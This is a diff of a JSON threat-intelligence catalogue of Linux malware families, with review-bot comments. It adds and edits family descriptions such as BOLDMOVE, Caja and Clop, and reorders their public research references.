"https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.kryptoslogic.com/blog/2020/12/automated-string-de-gobfuscation/",
- "https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go-en/"
+ "https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go-en/",
+ "https://www.kryptoslogic.com/blog/2020/12/automated-string-de-gobfuscation/"
],
"synonyms": [],
"type": []
@@ -3518,6 +3810,20 @@
"uuid": "a30aedcc-562e-437a-827c-55bc00cf3506",
"value": "Blackrota"
},
+ {
+ "description": "According to Mandiant, this malware family is attributed to potential chinese background and directly related to observed exploitation of Fortinet's SSL-VPN (CVE-2022-42475). There is also a Windows variant.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.boldmove",
+ "https://www.mandiant.com/resources/blog/chinese-actors-exploit-fortios-flaw",
+ "https://thehackernews.com/2023/01/new-chinese-malware-spotted-exploiting.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8f347147-c34e-4698-9439-c640233fca15",
+ "value": "BOLDMOVE (ELF)"
+ },
{
"description": "This is a pentesting tool and according to the author, \"BOtB is a container analysis and exploitation tool designed to be used by pentesters and engineers while also being CI/CD friendly with common CI/CD technologies.\".\r\n\r\nIt has been observed being used by TeamTNT in their activities for spreading crypto-mining malware.",
"meta": {
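Review bot: in the BOLDMOVE (ELF) description, "attributed to potential chinese background" is awkward and "chinese" should be capitalised; suggest "According to Mandiant, this malware family is attributed to a suspected Chinese actor and is directly related to observed exploitation of Fortinet's SSL-VPN (CVE-2022-42475). There is also a Windows variant."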
@@ -3538,10 +3844,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.botenago",
+ "https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits",
+ "https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux",
"https://cybersecurity.att.com/blogs/labs-research/botenago-strike-again-malware-source-code-uploaded-to-github",
"https://www.nozominetworks.com/blog/new-botenago-variant-discovered-by-nozomi-networks-labs/",
- "https://lifars.com/2022/01/newly-found-malware-threatens-iot-devices/",
- "https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits"
+ "https://lifars.com/2022/01/newly-found-malware-threatens-iot-devices/"
],
"synonyms": [],
"type": []
@@ -3554,15 +3861,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.bpfdoor",
+ "https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game",
+ "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf",
+ "https://twitter.com/cyb3rops/status/1523227511551033349",
+ "https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/",
+ "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896",
+ "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/",
+ "https://twitter.com/CraigHRowland/status/1523266585133457408",
"https://blog.qualys.com/vulnerabilities-threat-research/2022/08/01/heres-a-simple-script-to-detect-the-stealthy-nation-state-bpfdoor",
"https://elastic.github.io/security-research/intelligence/2022/05/04.bpfdoor/article/#",
- "https://troopers.de/troopers22/talks/7cv8pz/",
- "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf",
- "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/",
- "https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/",
- "https://twitter.com/CraigHRowland/status/1523266585133457408",
- "https://twitter.com/cyb3rops/status/1523227511551033349",
- "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896"
+ "https://troopers.de/troopers22/talks/7cv8pz/"
],
"synonyms": [
"JustForFun"
@@ -3572,17 +3880,30 @@
"uuid": "3c7082b6-0181-4064-8e35-ab522b49200f",
"value": "BPFDoor"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.brute_ratel",
+ "https://bruteratel.com/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "2fa4ac4e-3f89-4fd0-b4fd-2c776dcf69d8",
+ "value": "brute_ratel"
+ },
{
"description": "Pangu Lab discovered this backdoor during a forensic investigation in 2013. They refer to related incidents as \"Operation Telescreen\".",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.bvp47",
- "https://thehackernews.com/2022/02/chinese-experts-uncover-details-of.html",
- "https://www.pangulab.cn/files/The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group_ii.en.pdf",
- "https://www.bleepingcomputer.com/news/security/nsa-linked-bvp47-linux-backdoor-widely-undetected-for-10-years/",
- "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf",
"https://www.pangulab.cn/files/The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group.en.pdf",
- "https://www.pangulab.cn/en/post/the_bvp47_a_top-tier_backdoor_of_us_nsa_equation_group/"
+ "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf",
+ "https://www.pangulab.cn/files/The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group_ii.en.pdf",
+ "https://www.pangulab.cn/en/post/the_bvp47_a_top-tier_backdoor_of_us_nsa_equation_group/",
+ "https://www.bleepingcomputer.com/news/security/nsa-linked-bvp47-linux-backdoor-widely-undetected-for-10-years/",
+ "https://thehackernews.com/2022/02/chinese-experts-uncover-details-of.html"
],
"synonyms": [],
"type": []
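Review bot: the new `brute_ratel` entry is inconsistent with the other additions in this change: its `value` is the Malpedia slug rather than a display name (compare "BianLian (ELF)", "Black Basta (ELF)", "BOLDMOVE (ELF)"), and its description is empty even though bruteratel.com is listed as a ref. Use a display name with the "(ELF)" suffix, for example "Brute Ratel (ELF)", and add a one-line description so the entry sorts and renders like its neighbours.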
@@ -3590,6 +3911,19 @@
"uuid": "0492f9bf-3c5d-4c17-993b-2b53d0fb06f7",
"value": "Bvp47"
},
+ {
+ "description": "Linux malware cross-compiled for x86, MIPS, ARM. XOR encoded strings, 13 commands supported for its C&C, including downloading, file modification and execution and ability to run shell commands.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.caja",
+ "https://mp.weixin.qq.com/s/pd6fUs5TLdBtwUHauclDOQ"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "06816c22-be7c-44db-8d0d-395ab306bb9b",
+ "value": "Caja"
+ },
{
"description": "According to Avast Decoded, Caligula is an IRC multiplatform bot that allows to perform DDoS attacks. It is written in Go and distributed in ELF files targeting Intel 32/64bit code, as well as ARM 32bit and PowerPC 64bit. It is based on the Hellabot open source project.",
"meta": {
@@ -3621,11 +3955,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdorked",
- "https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/",
- "https://www.symantec.com/security-center/writeup/2013-050214-5501-99",
- "https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/",
"https://blogs.cisco.com/security/linuxcdorked-faqs",
- "https://blog.sucuri.net/2014/03/windigo-linux-analysis-ebury-and-cdorked.html"
+ "https://blog.sucuri.net/2014/03/windigo-linux-analysis-ebury-and-cdorked.html",
+ "https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/",
+ "https://www.symantec.com/security-center/writeup/2013-050214-5501-99",
+ "https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/"
],
"synonyms": [
"CDorked.A"
@@ -3674,13 +4008,27 @@
"uuid": "7a226df2-9599-4002-9a38-b044e16f76a9",
"value": "Cetus"
},
+ {
+ "description": "Multi-functional malware written in Go, targeting both Linux and Windows, evolved from elf.kaiji.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.chaos",
+ "https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html",
+ "https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ef03e3c3-32d5-483a-bd1f-97dd531c4bca",
+ "value": "Chaos (ELF)"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.chapro",
- "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html",
- "http://blog.eset.com/2012/12/18/malicious-apache-module-used-for-content-injection-linuxchapro-a"
+ "http://blog.eset.com/2012/12/18/malicious-apache-module-used-for-content-injection-linuxchapro-a",
+ "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html"
],
"synonyms": [],
"type": []
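Review bot: the Chaos (ELF) description refers to "elf.kaiji" by its Malpedia slug, but galaxy readers see entry names, not slugs, so write "evolved from Kaiji". Since the cluster format already expresses lineage through a `related` array with `"type": "similar"` (the one removed from Bashlite earlier in this diff), consider adding such a relationship to the Kaiji entry instead of carrying it only in prose.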
@@ -3701,16 +4049,33 @@
"uuid": "e5600185-39b7-49a0-bd60-a6806c7d47dd",
"value": "Chisel (ELF)"
},
+ {
+ "description": "ELF version of clop ransomware.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.clop",
+ "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/",
+ "https://www.helpnetsecurity.com/2023/02/07/cl0p-ransomware-decryptor-linux/",
+ "https://www.sentinelone.com/labs/cl0p-ransomware-targets-linux-systems-with-flawed-encryption-decryptor-available/"
+ ],
+ "synonyms": [
+ "Cl0p"
+ ],
+ "type": []
+ },
+ "uuid": "3d11ec52-9ca8-4d83-99d4-6658f306e8e4",
+ "value": "Clop (ELF)"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.cloud_snooper",
- "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
"https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-cloud-snooper-report.pdf",
+ "https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf",
"https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought",
- "https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf"
+ "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
],
"synonyms": [
"Snoopy"
@@ -3725,17 +4090,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.conti",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
+ "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
+ "https://damonmccoy.com/papers/Ransomware_eCrime22.pdf",
+ "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-group-targets-esxi-hypervisors-with-its-linux-variant.html",
+ "https://www.youtube.com/watch?v=cYx7sQRbjGA",
"https://www.esentire.com/blog/analysis-of-leaked-conti-intrusion-procedures-by-esentires-threat-response-unit-tru",
"https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
"https://securelist.com/new-ransomware-trends-in-2022/106457/",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
- "https://www.secureworks.com/blog/gold-ulrick-continues-conti-operations-despite-public-disclosures",
- "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
- "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-group-targets-esxi-hypervisors-with-its-linux-variant.html",
"https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again",
- "https://www.youtube.com/watch?v=cYx7sQRbjGA"
+ "https://www.secureworks.com/blog/gold-ulrick-continues-conti-operations-despite-public-disclosures",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself"
],
"synonyms": [
"Conti Locker"
@@ -3803,25 +4170,25 @@
"value": "CronRAT"
},
{
- "description": "According to CISA, Cyclops Blink appears to be a replacement framework for the VPNFilter malware exposed in 2018, and which exploited network devices, primarily small office/home office (SOHO) routers and network attached storage (NAS) devices. Cyclops Blink has been deployed since at least June 2019, fourteen months after VPNFilter was disrupted. In common with VPNFilter, Cyclops Blink deployment also appears indiscriminate and widespread. The actor has so far primarily deployed Cyclops Blink to WatchGuard devices, but it is likely that Sandworm would be capable of compiling the malware for other architectures and firmware.",
+ "description": "According to CISA, Cyclops Blink appears to be a replacement framework for the VPNFilter malware exposed in 2018, and which exploited network devices, primarily small office/home office (SOHO) routers and network attached storage (NAS) devices. Cyclops Blink has been deployed since at least June 2019, fourteen months after VPNFilter was disrupted. In common with VPNFilter, Cyclops Blink deployment also appears indiscriminate and widespread. The actor has so far primarily deployed Cyclops Blink to WatchGuard and ASUS devices, but it is likely that Sandworm would be capable of compiling the malware for other architectures and firmware.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.cyclops_blink",
- "https://github.com/trendmicro/research/blob/main/cyclops_blink/c2-scripts/check.py",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
- "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html",
- "https://www.bleepingcomputer.com/news/security/cisa-warns-orgs-of-watchguard-bug-exploited-by-russian-state-hackers/",
- "https://www.splunk.com/en_us/blog/security/strt-ta03-cpe-destructive-software.html",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-054a",
- "https://www.theregister.com/2022/03/18/cyclops_asus_routers/",
- "https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-disruption-botnet-controlled-russian-federation",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyclops-blink-sets-sights-on-asus-routers/Appendix_Cyclops%20Blink%20Sets%20Sights%20on%20ASUS%20Routers.pdf",
- "https://www.justice.gov/opa/press-release/file/1491281/download",
"https://www.justice.gov/opa/video/attorney-general-merrick-b-garland-announces-enforcement-actions-disrupt-and-prosecute",
- "https://attack.mitre.org/groups/G0034",
- "https://www.bleepingcomputer.com/news/security/us-disrupts-russian-cyclops-blink-botnet-before-being-used-in-attacks/",
+ "https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-disruption-botnet-controlled-russian-federation",
+ "https://github.com/trendmicro/research/blob/main/cyclops_blink/c2-scripts/check.py",
"https://www.shadowserver.org/news/shadowserver-special-reports-cyclops-blink/",
- "https://www.bleepingcomputer.com/news/security/asus-warns-of-cyclops-blink-malware-attacks-targeting-routers/"
+ "https://www.splunk.com/en_us/blog/security/strt-ta03-cpe-destructive-software.html",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
+ "https://www.bleepingcomputer.com/news/security/asus-warns-of-cyclops-blink-malware-attacks-targeting-routers/",
+ "https://www.bleepingcomputer.com/news/security/us-disrupts-russian-cyclops-blink-botnet-before-being-used-in-attacks/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyclops-blink-sets-sights-on-asus-routers/Appendix_Cyclops%20Blink%20Sets%20Sights%20on%20ASUS%20Routers.pdf",
+ "https://www.bleepingcomputer.com/news/security/cisa-warns-orgs-of-watchguard-bug-exploited-by-russian-state-hackers/",
+ "https://www.justice.gov/opa/press-release/file/1491281/download",
+ "https://www.theregister.com/2022/03/18/cyclops_asus_routers/",
+ "https://attack.mitre.org/groups/G0034",
+ "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html"
],
"synonyms": [],
"type": []
@@ -3834,15 +4201,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.dacls",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://blog.netlab.360.com/dacls-the-dual-platform-rat/",
+ "https://www.sygnia.co/mata-framework",
+ "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/",
+ "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought",
"https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
"https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/",
- "https://blog.netlab.360.com/dacls-the-dual-platform-rat/",
- "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/",
- "https://www.sygnia.co/mata-framework",
- "https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought"
+ "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
],
"synonyms": [],
"type": []
@@ -3855,11 +4222,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.dark",
- "https://twitter.com/ESETresearch/status/1440052837820428298?s=20",
- "https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/",
"https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities",
+ "https://twitter.com/ESETresearch/status/1440052837820428298?s=20",
+ "https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx",
"https://www.radware.com/getmedia/d312a5fa-2d8d-4c1e-b31e-73046f24bf35/Alert-Dark-OMIGOD.aspx",
- "https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx"
+ "https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/"
],
"synonyms": [
"Dark.IoT"
@@ -3888,58 +4255,59 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.darkside",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/",
- "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
- "https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/",
"https://krebsonsecurity.com/2021/05/darkside-ransomware-gang-quits-after-servers-bitcoin-stash-seized/",
- "https://blog.group-ib.com/blackmatter#",
- "https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636",
- "https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/",
- "https://www.nytimes.com/2021/05/29/world/europe/ransomware-russia-darkside.html",
- "https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted",
- "https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/",
- "https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access",
- "https://therecord.media/popular-hacking-forum-bans-ransomware-ads/",
- "https://abcnews.go.com/Politics/biden-speak-colonial-pipeline-attack-americans-face-gasoline/story?id=77666212",
"https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/",
- "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b",
- "https://www.justice.gov/opa/pr/department-justice-seizes-23-million-cryptocurrency-paid-ransomware-extortionists-darkside",
- "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/",
- "https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://www.ic3.gov/Media/News/2021/211101.pdf",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
- "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group",
- "https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html",
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/darkside-ransomware-victims-sold-short/",
- "https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin",
- "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/",
- "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/",
+ "https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
"https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime",
- "https://twitter.com/JAMESWT_MHT/status/1388301138437578757",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/",
- "https://www.youtube.com/watch?v=NIiEcOryLpI",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
- "https://twitter.com/GelosSnake/status/1451465959894667275",
- "https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/",
- "https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/",
+ "https://www.youtube.com/watch?v=qxPXxWMI2i4",
+ "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/",
+ "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.justice.gov/opa/pr/department-justice-seizes-23-million-cryptocurrency-paid-ransomware-extortionists-darkside",
+ "https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/",
+ "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/",
+ "https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin",
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://www.nytimes.com/2021/05/29/world/europe/ransomware-russia-darkside.html",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://abcnews.go.com/Politics/biden-speak-colonial-pipeline-attack-americans-face-gasoline/story?id=77666212",
"https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/",
+ "https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/",
"https://pylos.co/2021/05/13/mind-the-air-gap/",
"https://otx.alienvault.com/pulse/60d0afbc395c24edefb33bb9",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ "https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/",
+ "https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted",
+ "https://twitter.com/GelosSnake/status/1451465959894667275",
+ "https://blog.group-ib.com/blackmatter#",
+ "https://www.ic3.gov/Media/News/2021/211101.pdf",
+ "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/",
+ "https://twitter.com/JAMESWT_MHT/status/1388301138437578757",
+ "https://therecord.media/popular-hacking-forum-bans-ransomware-ads/",
"https://cybersecurity.att.com/blogs/labs-research/darkside-raas-in-linux-version",
- "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/",
- "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
- "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/",
+ "https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/",
"https://blog.group-ib.com/blackmatter2",
- "https://www.youtube.com/watch?v=qxPXxWMI2i4"
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
+ "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access",
+ "https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/",
+ "https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims",
+ "https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/",
+ "https://www.youtube.com/watch?v=NIiEcOryLpI",
+ "https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/",
+ "https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/",
+ "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group"
],
"synonyms": [],
"type": []
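Review bot: the DarkSide refs now hold the CrowdStrike "carbon-spider-sprite-spider-target-esxi-servers-with-ransomware" post twice, once with the `?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout` tracking query and once as the clean URL; the tracked variant should be dropped (or query strings stripped on import) so each source appears once. Apart from that, the single new reference here is the blogs.vmware.com ESXi-targeting ransomware post; the remaining roughly fifty changed lines are reordering of existing entries.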
@@ -3966,9 +4334,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.ddg",
"https://blog.netlab.360.com/ddg-mining-botnet-jin-qi-huo-dong-fen-xi/",
- "https://blog.netlab.360.com/threat-alert-ddg-3013-is-out/",
"https://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/",
"https://blog.netlab.360.com/ddg-botnet-round-x-is-there-an-ending/",
+ "https://blog.netlab.360.com/threat-alert-ddg-3013-is-out/",
"https://blog.netlab.360.com/old-botnets-never-die-and-ddg-refuse-to-fade-away/"
],
"synonyms": [],
@@ -3991,14 +4359,14 @@
"value": "ddoor"
},
{
- "description": "DEADBOLT is a linux ransomware written in GO, targeting QNAP NAS devices worldwide. The files are encrypted with AES128 encryption and will have the .deadbolt extension appended to file names.",
